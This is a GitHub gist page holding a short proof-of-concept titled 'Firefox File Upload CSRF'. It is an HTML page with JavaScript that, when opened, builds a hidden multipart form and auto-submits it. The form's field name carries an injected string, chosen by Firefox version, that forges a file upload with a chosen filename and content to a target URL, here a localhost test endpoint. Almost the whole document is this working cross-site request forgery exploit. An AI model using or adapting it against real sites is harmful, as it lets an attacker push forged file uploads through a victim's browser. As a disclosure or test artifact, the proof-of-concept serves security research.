Instantly share code, notes, and snippets.

@gregose /csrf_upload.js Secret
Created May 11, 2011

Embed
What would you like to do?
Firefox File Upload CSRF
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script>
$(document).ready(function() {
var request = {
"url": "http://localhost:4567/test",
"file_name": "uptest.foo",
"param_name": "file",
"file_content": "blah content"
}
if(jQuery.browser.version[0] == '2') {
var injection = '\\"; name=' + request['param_name'] + '; filename=' + request['file_name'] + ';';
} else {
var injection = request['param_name'] + '"; filename="' + request['file_name'];
}
$("<form>")
.attr("method", "POST")
.attr("enctype", "multipart/form-data")
.attr("action", request['url'])
.appendTo("body");
$("<input>")
.attr("type", "hidden")
.attr("name", injection)
.attr("value", request['file_content'])
.appendTo("form");
$("form").submit();
});
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment